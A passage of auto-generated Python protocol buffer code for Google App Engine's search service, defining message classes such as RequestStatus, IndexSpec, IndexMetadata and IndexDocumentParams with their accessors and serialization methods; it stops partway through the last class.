text
stringlengths 4
1.02M
| meta
dict |
|---|---|
from google.net.proto import ProtocolBuffer
import array
import dummy_thread as thread
__pychecker__ = """maxreturns=0 maxbranches=0 no-callinit
unusednames=printElemNumber,debug_strs no-special"""
if hasattr(ProtocolBuffer, 'ExtendableProtocolMessage'):
_extension_runtime = True
_ExtendableProtocolMessage = ProtocolBuffer.ExtendableProtocolMessage
else:
_extension_runtime = False
_ExtendableProtocolMessage = ProtocolBuffer.ProtocolMessage
from google.appengine.datastore.document_pb import *
import google.appengine.datastore.document_pb
class SearchServiceError(ProtocolBuffer.ProtocolMessage):
OK = 0
INVALID_REQUEST = 1
TRANSIENT_ERROR = 2
INTERNAL_ERROR = 3
PERMISSION_DENIED = 4
TIMEOUT = 5
CONCURRENT_TRANSACTION = 6
_ErrorCode_NAMES = {
0: "OK",
1: "INVALID_REQUEST",
2: "TRANSIENT_ERROR",
3: "INTERNAL_ERROR",
4: "PERMISSION_DENIED",
5: "TIMEOUT",
6: "CONCURRENT_TRANSACTION",
}
def ErrorCode_Name(cls, x): return cls._ErrorCode_NAMES.get(x, "")
ErrorCode_Name = classmethod(ErrorCode_Name)
def __init__(self, contents=None):
pass
if contents is not None: self.MergeFromString(contents)
def MergeFrom(self, x):
assert x is not self
def Equals(self, x):
if x is self: return 1
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
return n
def ByteSizePartial(self):
n = 0
return n
def Clear(self):
pass
def OutputUnchecked(self, out):
pass
def OutputPartial(self, out):
pass
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
}, 0)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
}, 0, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.SearchServiceError'
class RequestStatus(ProtocolBuffer.ProtocolMessage):
has_code_ = 0
code_ = 0
has_error_detail_ = 0
error_detail_ = ""
has_canonical_code_ = 0
canonical_code_ = 0
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def code(self): return self.code_
def set_code(self, x):
self.has_code_ = 1
self.code_ = x
def clear_code(self):
if self.has_code_:
self.has_code_ = 0
self.code_ = 0
def has_code(self): return self.has_code_
def error_detail(self): return self.error_detail_
def set_error_detail(self, x):
self.has_error_detail_ = 1
self.error_detail_ = x
def clear_error_detail(self):
if self.has_error_detail_:
self.has_error_detail_ = 0
self.error_detail_ = ""
def has_error_detail(self): return self.has_error_detail_
def canonical_code(self): return self.canonical_code_
def set_canonical_code(self, x):
self.has_canonical_code_ = 1
self.canonical_code_ = x
def clear_canonical_code(self):
if self.has_canonical_code_:
self.has_canonical_code_ = 0
self.canonical_code_ = 0
def has_canonical_code(self): return self.has_canonical_code_
def MergeFrom(self, x):
assert x is not self
if (x.has_code()): self.set_code(x.code())
if (x.has_error_detail()): self.set_error_detail(x.error_detail())
if (x.has_canonical_code()): self.set_canonical_code(x.canonical_code())
def Equals(self, x):
if x is self: return 1
if self.has_code_ != x.has_code_: return 0
if self.has_code_ and self.code_ != x.code_: return 0
if self.has_error_detail_ != x.has_error_detail_: return 0
if self.has_error_detail_ and self.error_detail_ != x.error_detail_: return 0
if self.has_canonical_code_ != x.has_canonical_code_: return 0
if self.has_canonical_code_ and self.canonical_code_ != x.canonical_code_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_code_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: code not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthVarInt64(self.code_)
if (self.has_error_detail_): n += 1 + self.lengthString(len(self.error_detail_))
if (self.has_canonical_code_): n += 1 + self.lengthVarInt64(self.canonical_code_)
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_code_):
n += 1
n += self.lengthVarInt64(self.code_)
if (self.has_error_detail_): n += 1 + self.lengthString(len(self.error_detail_))
if (self.has_canonical_code_): n += 1 + self.lengthVarInt64(self.canonical_code_)
return n
def Clear(self):
self.clear_code()
self.clear_error_detail()
self.clear_canonical_code()
def OutputUnchecked(self, out):
out.putVarInt32(8)
out.putVarInt32(self.code_)
if (self.has_error_detail_):
out.putVarInt32(18)
out.putPrefixedString(self.error_detail_)
if (self.has_canonical_code_):
out.putVarInt32(24)
out.putVarInt32(self.canonical_code_)
def OutputPartial(self, out):
if (self.has_code_):
out.putVarInt32(8)
out.putVarInt32(self.code_)
if (self.has_error_detail_):
out.putVarInt32(18)
out.putPrefixedString(self.error_detail_)
if (self.has_canonical_code_):
out.putVarInt32(24)
out.putVarInt32(self.canonical_code_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 8:
self.set_code(d.getVarInt32())
continue
if tt == 18:
self.set_error_detail(d.getPrefixedString())
continue
if tt == 24:
self.set_canonical_code(d.getVarInt32())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_code_: res+=prefix+("code: %s\n" % self.DebugFormatInt32(self.code_))
if self.has_error_detail_: res+=prefix+("error_detail: %s\n" % self.DebugFormatString(self.error_detail_))
if self.has_canonical_code_: res+=prefix+("canonical_code: %s\n" % self.DebugFormatInt32(self.canonical_code_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kcode = 1
kerror_detail = 2
kcanonical_code = 3
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "code",
2: "error_detail",
3: "canonical_code",
}, 3)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.NUMERIC,
2: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.NUMERIC,
}, 3, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.RequestStatus'
class IndexSpec(ProtocolBuffer.ProtocolMessage):
GLOBAL = 0
PER_DOCUMENT = 1
_Consistency_NAMES = {
0: "GLOBAL",
1: "PER_DOCUMENT",
}
def Consistency_Name(cls, x): return cls._Consistency_NAMES.get(x, "")
Consistency_Name = classmethod(Consistency_Name)
SEARCH = 0
DATASTORE = 1
CLOUD_STORAGE = 2
_Source_NAMES = {
0: "SEARCH",
1: "DATASTORE",
2: "CLOUD_STORAGE",
}
def Source_Name(cls, x): return cls._Source_NAMES.get(x, "")
Source_Name = classmethod(Source_Name)
PRIORITY = 0
BACKGROUND = 1
_Mode_NAMES = {
0: "PRIORITY",
1: "BACKGROUND",
}
def Mode_Name(cls, x): return cls._Mode_NAMES.get(x, "")
Mode_Name = classmethod(Mode_Name)
has_name_ = 0
name_ = ""
has_consistency_ = 0
consistency_ = 1
has_namespace_ = 0
namespace_ = ""
has_version_ = 0
version_ = 0
has_source_ = 0
source_ = 0
has_mode_ = 0
mode_ = 0
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def name(self): return self.name_
def set_name(self, x):
self.has_name_ = 1
self.name_ = x
def clear_name(self):
if self.has_name_:
self.has_name_ = 0
self.name_ = ""
def has_name(self): return self.has_name_
def consistency(self): return self.consistency_
def set_consistency(self, x):
self.has_consistency_ = 1
self.consistency_ = x
def clear_consistency(self):
if self.has_consistency_:
self.has_consistency_ = 0
self.consistency_ = 1
def has_consistency(self): return self.has_consistency_
def namespace(self): return self.namespace_
def set_namespace(self, x):
self.has_namespace_ = 1
self.namespace_ = x
def clear_namespace(self):
if self.has_namespace_:
self.has_namespace_ = 0
self.namespace_ = ""
def has_namespace(self): return self.has_namespace_
def version(self): return self.version_
def set_version(self, x):
self.has_version_ = 1
self.version_ = x
def clear_version(self):
if self.has_version_:
self.has_version_ = 0
self.version_ = 0
def has_version(self): return self.has_version_
def source(self): return self.source_
def set_source(self, x):
self.has_source_ = 1
self.source_ = x
def clear_source(self):
if self.has_source_:
self.has_source_ = 0
self.source_ = 0
def has_source(self): return self.has_source_
def mode(self): return self.mode_
def set_mode(self, x):
self.has_mode_ = 1
self.mode_ = x
def clear_mode(self):
if self.has_mode_:
self.has_mode_ = 0
self.mode_ = 0
def has_mode(self): return self.has_mode_
def MergeFrom(self, x):
assert x is not self
if (x.has_name()): self.set_name(x.name())
if (x.has_consistency()): self.set_consistency(x.consistency())
if (x.has_namespace()): self.set_namespace(x.namespace())
if (x.has_version()): self.set_version(x.version())
if (x.has_source()): self.set_source(x.source())
if (x.has_mode()): self.set_mode(x.mode())
def Equals(self, x):
if x is self: return 1
if self.has_name_ != x.has_name_: return 0
if self.has_name_ and self.name_ != x.name_: return 0
if self.has_consistency_ != x.has_consistency_: return 0
if self.has_consistency_ and self.consistency_ != x.consistency_: return 0
if self.has_namespace_ != x.has_namespace_: return 0
if self.has_namespace_ and self.namespace_ != x.namespace_: return 0
if self.has_version_ != x.has_version_: return 0
if self.has_version_ and self.version_ != x.version_: return 0
if self.has_source_ != x.has_source_: return 0
if self.has_source_ and self.source_ != x.source_: return 0
if self.has_mode_ != x.has_mode_: return 0
if self.has_mode_ and self.mode_ != x.mode_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_name_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: name not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.name_))
if (self.has_consistency_): n += 1 + self.lengthVarInt64(self.consistency_)
if (self.has_namespace_): n += 1 + self.lengthString(len(self.namespace_))
if (self.has_version_): n += 1 + self.lengthVarInt64(self.version_)
if (self.has_source_): n += 1 + self.lengthVarInt64(self.source_)
if (self.has_mode_): n += 1 + self.lengthVarInt64(self.mode_)
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_name_):
n += 1
n += self.lengthString(len(self.name_))
if (self.has_consistency_): n += 1 + self.lengthVarInt64(self.consistency_)
if (self.has_namespace_): n += 1 + self.lengthString(len(self.namespace_))
if (self.has_version_): n += 1 + self.lengthVarInt64(self.version_)
if (self.has_source_): n += 1 + self.lengthVarInt64(self.source_)
if (self.has_mode_): n += 1 + self.lengthVarInt64(self.mode_)
return n
def Clear(self):
self.clear_name()
self.clear_consistency()
self.clear_namespace()
self.clear_version()
self.clear_source()
self.clear_mode()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.name_)
if (self.has_consistency_):
out.putVarInt32(16)
out.putVarInt32(self.consistency_)
if (self.has_namespace_):
out.putVarInt32(26)
out.putPrefixedString(self.namespace_)
if (self.has_version_):
out.putVarInt32(32)
out.putVarInt32(self.version_)
if (self.has_source_):
out.putVarInt32(40)
out.putVarInt32(self.source_)
if (self.has_mode_):
out.putVarInt32(48)
out.putVarInt32(self.mode_)
def OutputPartial(self, out):
if (self.has_name_):
out.putVarInt32(10)
out.putPrefixedString(self.name_)
if (self.has_consistency_):
out.putVarInt32(16)
out.putVarInt32(self.consistency_)
if (self.has_namespace_):
out.putVarInt32(26)
out.putPrefixedString(self.namespace_)
if (self.has_version_):
out.putVarInt32(32)
out.putVarInt32(self.version_)
if (self.has_source_):
out.putVarInt32(40)
out.putVarInt32(self.source_)
if (self.has_mode_):
out.putVarInt32(48)
out.putVarInt32(self.mode_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_name(d.getPrefixedString())
continue
if tt == 16:
self.set_consistency(d.getVarInt32())
continue
if tt == 26:
self.set_namespace(d.getPrefixedString())
continue
if tt == 32:
self.set_version(d.getVarInt32())
continue
if tt == 40:
self.set_source(d.getVarInt32())
continue
if tt == 48:
self.set_mode(d.getVarInt32())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_name_: res+=prefix+("name: %s\n" % self.DebugFormatString(self.name_))
if self.has_consistency_: res+=prefix+("consistency: %s\n" % self.DebugFormatInt32(self.consistency_))
if self.has_namespace_: res+=prefix+("namespace: %s\n" % self.DebugFormatString(self.namespace_))
if self.has_version_: res+=prefix+("version: %s\n" % self.DebugFormatInt32(self.version_))
if self.has_source_: res+=prefix+("source: %s\n" % self.DebugFormatInt32(self.source_))
if self.has_mode_: res+=prefix+("mode: %s\n" % self.DebugFormatInt32(self.mode_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kname = 1
kconsistency = 2
knamespace = 3
kversion = 4
ksource = 5
kmode = 6
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "name",
2: "consistency",
3: "namespace",
4: "version",
5: "source",
6: "mode",
}, 6)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.NUMERIC,
3: ProtocolBuffer.Encoder.STRING,
4: ProtocolBuffer.Encoder.NUMERIC,
5: ProtocolBuffer.Encoder.NUMERIC,
6: ProtocolBuffer.Encoder.NUMERIC,
}, 6, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.IndexSpec'
class IndexMetadata_Storage(ProtocolBuffer.ProtocolMessage):
has_amount_used_ = 0
amount_used_ = 0
has_limit_ = 0
limit_ = 0
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def amount_used(self): return self.amount_used_
def set_amount_used(self, x):
self.has_amount_used_ = 1
self.amount_used_ = x
def clear_amount_used(self):
if self.has_amount_used_:
self.has_amount_used_ = 0
self.amount_used_ = 0
def has_amount_used(self): return self.has_amount_used_
def limit(self): return self.limit_
def set_limit(self, x):
self.has_limit_ = 1
self.limit_ = x
def clear_limit(self):
if self.has_limit_:
self.has_limit_ = 0
self.limit_ = 0
def has_limit(self): return self.has_limit_
def MergeFrom(self, x):
assert x is not self
if (x.has_amount_used()): self.set_amount_used(x.amount_used())
if (x.has_limit()): self.set_limit(x.limit())
def Equals(self, x):
if x is self: return 1
if self.has_amount_used_ != x.has_amount_used_: return 0
if self.has_amount_used_ and self.amount_used_ != x.amount_used_: return 0
if self.has_limit_ != x.has_limit_: return 0
if self.has_limit_ and self.limit_ != x.limit_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
if (self.has_amount_used_): n += 1 + self.lengthVarInt64(self.amount_used_)
if (self.has_limit_): n += 1 + self.lengthVarInt64(self.limit_)
return n
def ByteSizePartial(self):
n = 0
if (self.has_amount_used_): n += 1 + self.lengthVarInt64(self.amount_used_)
if (self.has_limit_): n += 1 + self.lengthVarInt64(self.limit_)
return n
def Clear(self):
self.clear_amount_used()
self.clear_limit()
def OutputUnchecked(self, out):
if (self.has_amount_used_):
out.putVarInt32(8)
out.putVarInt64(self.amount_used_)
if (self.has_limit_):
out.putVarInt32(16)
out.putVarInt64(self.limit_)
def OutputPartial(self, out):
if (self.has_amount_used_):
out.putVarInt32(8)
out.putVarInt64(self.amount_used_)
if (self.has_limit_):
out.putVarInt32(16)
out.putVarInt64(self.limit_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 8:
self.set_amount_used(d.getVarInt64())
continue
if tt == 16:
self.set_limit(d.getVarInt64())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_amount_used_: res+=prefix+("amount_used: %s\n" % self.DebugFormatInt64(self.amount_used_))
if self.has_limit_: res+=prefix+("limit: %s\n" % self.DebugFormatInt64(self.limit_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kamount_used = 1
klimit = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "amount_used",
2: "limit",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.NUMERIC,
2: ProtocolBuffer.Encoder.NUMERIC,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.IndexMetadata_Storage'
class IndexMetadata(ProtocolBuffer.ProtocolMessage):
ACTIVE = 0
SOFT_DELETED = 1
PURGING = 2
_IndexState_NAMES = {
0: "ACTIVE",
1: "SOFT_DELETED",
2: "PURGING",
}
def IndexState_Name(cls, x): return cls._IndexState_NAMES.get(x, "")
IndexState_Name = classmethod(IndexState_Name)
has_index_spec_ = 0
has_storage_ = 0
storage_ = None
has_index_state_ = 0
index_state_ = 0
has_index_delete_time_ = 0
index_delete_time_ = 0
def __init__(self, contents=None):
self.index_spec_ = IndexSpec()
self.field_ = []
self.lazy_init_lock_ = thread.allocate_lock()
if contents is not None: self.MergeFromString(contents)
def index_spec(self): return self.index_spec_
def mutable_index_spec(self): self.has_index_spec_ = 1; return self.index_spec_
def clear_index_spec(self):self.has_index_spec_ = 0; self.index_spec_.Clear()
def has_index_spec(self): return self.has_index_spec_
def field_size(self): return len(self.field_)
def field_list(self): return self.field_
def field(self, i):
return self.field_[i]
def mutable_field(self, i):
return self.field_[i]
def add_field(self):
x = FieldTypes()
self.field_.append(x)
return x
def clear_field(self):
self.field_ = []
def storage(self):
if self.storage_ is None:
self.lazy_init_lock_.acquire()
try:
if self.storage_ is None: self.storage_ = IndexMetadata_Storage()
finally:
self.lazy_init_lock_.release()
return self.storage_
def mutable_storage(self): self.has_storage_ = 1; return self.storage()
def clear_storage(self):
if self.has_storage_:
self.has_storage_ = 0;
if self.storage_ is not None: self.storage_.Clear()
def has_storage(self): return self.has_storage_
def index_state(self): return self.index_state_
def set_index_state(self, x):
self.has_index_state_ = 1
self.index_state_ = x
def clear_index_state(self):
if self.has_index_state_:
self.has_index_state_ = 0
self.index_state_ = 0
def has_index_state(self): return self.has_index_state_
def index_delete_time(self): return self.index_delete_time_
def set_index_delete_time(self, x):
self.has_index_delete_time_ = 1
self.index_delete_time_ = x
def clear_index_delete_time(self):
if self.has_index_delete_time_:
self.has_index_delete_time_ = 0
self.index_delete_time_ = 0
def has_index_delete_time(self): return self.has_index_delete_time_
def MergeFrom(self, x):
assert x is not self
if (x.has_index_spec()): self.mutable_index_spec().MergeFrom(x.index_spec())
for i in xrange(x.field_size()): self.add_field().CopyFrom(x.field(i))
if (x.has_storage()): self.mutable_storage().MergeFrom(x.storage())
if (x.has_index_state()): self.set_index_state(x.index_state())
if (x.has_index_delete_time()): self.set_index_delete_time(x.index_delete_time())
def Equals(self, x):
if x is self: return 1
if self.has_index_spec_ != x.has_index_spec_: return 0
if self.has_index_spec_ and self.index_spec_ != x.index_spec_: return 0
if len(self.field_) != len(x.field_): return 0
for e1, e2 in zip(self.field_, x.field_):
if e1 != e2: return 0
if self.has_storage_ != x.has_storage_: return 0
if self.has_storage_ and self.storage_ != x.storage_: return 0
if self.has_index_state_ != x.has_index_state_: return 0
if self.has_index_state_ and self.index_state_ != x.index_state_: return 0
if self.has_index_delete_time_ != x.has_index_delete_time_: return 0
if self.has_index_delete_time_ and self.index_delete_time_ != x.index_delete_time_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_index_spec_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: index_spec not set.')
elif not self.index_spec_.IsInitialized(debug_strs): initialized = 0
for p in self.field_:
if not p.IsInitialized(debug_strs): initialized=0
if (self.has_storage_ and not self.storage_.IsInitialized(debug_strs)): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(self.index_spec_.ByteSize())
n += 1 * len(self.field_)
for i in xrange(len(self.field_)): n += self.lengthString(self.field_[i].ByteSize())
if (self.has_storage_): n += 1 + self.lengthString(self.storage_.ByteSize())
if (self.has_index_state_): n += 1 + self.lengthVarInt64(self.index_state_)
if (self.has_index_delete_time_): n += 1 + self.lengthVarInt64(self.index_delete_time_)
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_index_spec_):
n += 1
n += self.lengthString(self.index_spec_.ByteSizePartial())
n += 1 * len(self.field_)
for i in xrange(len(self.field_)): n += self.lengthString(self.field_[i].ByteSizePartial())
if (self.has_storage_): n += 1 + self.lengthString(self.storage_.ByteSizePartial())
if (self.has_index_state_): n += 1 + self.lengthVarInt64(self.index_state_)
if (self.has_index_delete_time_): n += 1 + self.lengthVarInt64(self.index_delete_time_)
return n
def Clear(self):
self.clear_index_spec()
self.clear_field()
self.clear_storage()
self.clear_index_state()
self.clear_index_delete_time()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putVarInt32(self.index_spec_.ByteSize())
self.index_spec_.OutputUnchecked(out)
for i in xrange(len(self.field_)):
out.putVarInt32(18)
out.putVarInt32(self.field_[i].ByteSize())
self.field_[i].OutputUnchecked(out)
if (self.has_storage_):
out.putVarInt32(26)
out.putVarInt32(self.storage_.ByteSize())
self.storage_.OutputUnchecked(out)
if (self.has_index_state_):
out.putVarInt32(32)
out.putVarInt32(self.index_state_)
if (self.has_index_delete_time_):
out.putVarInt32(40)
out.putVarInt64(self.index_delete_time_)
def OutputPartial(self, out):
if (self.has_index_spec_):
out.putVarInt32(10)
out.putVarInt32(self.index_spec_.ByteSizePartial())
self.index_spec_.OutputPartial(out)
for i in xrange(len(self.field_)):
out.putVarInt32(18)
out.putVarInt32(self.field_[i].ByteSizePartial())
self.field_[i].OutputPartial(out)
if (self.has_storage_):
out.putVarInt32(26)
out.putVarInt32(self.storage_.ByteSizePartial())
self.storage_.OutputPartial(out)
if (self.has_index_state_):
out.putVarInt32(32)
out.putVarInt32(self.index_state_)
if (self.has_index_delete_time_):
out.putVarInt32(40)
out.putVarInt64(self.index_delete_time_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_index_spec().TryMerge(tmp)
continue
if tt == 18:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_field().TryMerge(tmp)
continue
if tt == 26:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_storage().TryMerge(tmp)
continue
if tt == 32:
self.set_index_state(d.getVarInt32())
continue
if tt == 40:
self.set_index_delete_time(d.getVarInt64())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_index_spec_:
res+=prefix+"index_spec <\n"
res+=self.index_spec_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt=0
for e in self.field_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("field%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
if self.has_storage_:
res+=prefix+"storage <\n"
res+=self.storage_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
if self.has_index_state_: res+=prefix+("index_state: %s\n" % self.DebugFormatInt32(self.index_state_))
if self.has_index_delete_time_: res+=prefix+("index_delete_time: %s\n" % self.DebugFormatInt64(self.index_delete_time_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kindex_spec = 1
kfield = 2
kstorage = 3
kindex_state = 4
kindex_delete_time = 5
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "index_spec",
2: "field",
3: "storage",
4: "index_state",
5: "index_delete_time",
}, 5)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.STRING,
4: ProtocolBuffer.Encoder.NUMERIC,
5: ProtocolBuffer.Encoder.NUMERIC,
}, 5, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.IndexMetadata'
class IndexDocumentParams(ProtocolBuffer.ProtocolMessage):
SYNCHRONOUSLY = 0
WHEN_CONVENIENT = 1
_Freshness_NAMES = {
0: "SYNCHRONOUSLY",
1: "WHEN_CONVENIENT",
}
def Freshness_Name(cls, x): return cls._Freshness_NAMES.get(x, "")
Freshness_Name = classmethod(Freshness_Name)
has_freshness_ = 0
freshness_ = 0
has_index_spec_ = 0
def __init__(self, contents=None):
self.document_ = []
self.index_spec_ = IndexSpec()
if contents is not None: self.MergeFromString(contents)
def document_size(self): return len(self.document_)
def document_list(self): return self.document_
def document(self, i):
return self.document_[i]
def mutable_document(self, i):
return self.document_[i]
def add_document(self):
x = Document()
self.document_.append(x)
return x
def clear_document(self):
self.document_ = []
def freshness(self): return self.freshness_
def set_freshness(self, x):
self.has_freshness_ = 1
self.freshness_ = x
def clear_freshness(self):
if self.has_freshness_:
self.has_freshness_ = 0
self.freshness_ = 0
def has_freshness(self): return self.has_freshness_
def index_spec(self): return self.index_spec_
def mutable_index_spec(self): self.has_index_spec_ = 1; return self.index_spec_
def clear_index_spec(self):self.has_index_spec_ = 0; self.index_spec_.Clear()
def has_index_spec(self): return self.has_index_spec_
def MergeFrom(self, x):
assert x is not self
for i in xrange(x.document_size()): self.add_document().CopyFrom(x.document(i))
if (x.has_freshness()): self.set_freshness(x.freshness())
if (x.has_index_spec()): self.mutable_index_spec().MergeFrom(x.index_spec())
def Equals(self, x):
if x is self: return 1
if len(self.document_) != len(x.document_): return 0
for e1, e2 in zip(self.document_, x.document_):
if e1 != e2: return 0
if self.has_freshness_ != x.has_freshness_: return 0
if self.has_freshness_ and self.freshness_ != x.freshness_: return 0
if self.has_index_spec_ != x.has_index_spec_: return 0
if self.has_index_spec_ and self.index_spec_ != x.index_spec_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
for p in self.document_:
if not p.IsInitialized(debug_strs): initialized=0
if (not self.has_index_spec_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: index_spec not set.')
elif not self.index_spec_.IsInitialized(debug_strs): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += 1 * len(self.document_)
for i in xrange(len(self.document_)): n += self.lengthString(self.document_[i].ByteSize())
if (self.has_freshness_): n += 1 + self.lengthVarInt64(self.freshness_)
n += self.lengthString(self.index_spec_.ByteSize())
return n + 1
def ByteSizePartial(self):
n = 0
n += 1 * len(self.document_)
for i in xrange(len(self.document_)): n += self.lengthString(self.document_[i].ByteSizePartial())
if (self.has_freshness_): n += 1 + self.lengthVarInt64(self.freshness_)
if (self.has_index_spec_):
n += 1
n += self.lengthString(self.index_spec_.ByteSizePartial())
return n
def Clear(self):
self.clear_document()
self.clear_freshness()
self.clear_index_spec()
def OutputUnchecked(self, out):
for i in xrange(len(self.document_)):
out.putVarInt32(10)
out.putVarInt32(self.document_[i].ByteSize())
self.document_[i].OutputUnchecked(out)
if (self.has_freshness_):
out.putVarInt32(16)
out.putVarInt32(self.freshness_)
out.putVarInt32(26)
out.putVarInt32(self.index_spec_.ByteSize())
self.index_spec_.OutputUnchecked(out)
def OutputPartial(self, out):
for i in xrange(len(self.document_)):
out.putVarInt32(10)
out.putVarInt32(self.document_[i].ByteSizePartial())
self.document_[i].OutputPartial(out)
if (self.has_freshness_):
out.putVarInt32(16)
out.putVarInt32(self.freshness_)
if (self.has_index_spec_):
out.putVarInt32(26)
out.putVarInt32(self.index_spec_.ByteSizePartial())
self.index_spec_.OutputPartial(out)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_document().TryMerge(tmp)
continue
if tt == 16:
self.set_freshness(d.getVarInt32())
continue
if tt == 26:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_index_spec().TryMerge(tmp)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
cnt=0
for e in self.document_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("document%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
if self.has_freshness_: res+=prefix+("freshness: %s\n" % self.DebugFormatInt32(self.freshness_))
if self.has_index_spec_:
res+=prefix+"index_spec <\n"
res+=self.index_spec_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kdocument = 1
kfreshness = 2
kindex_spec = 3
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "document",
2: "freshness",
3: "index_spec",
}, 3)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
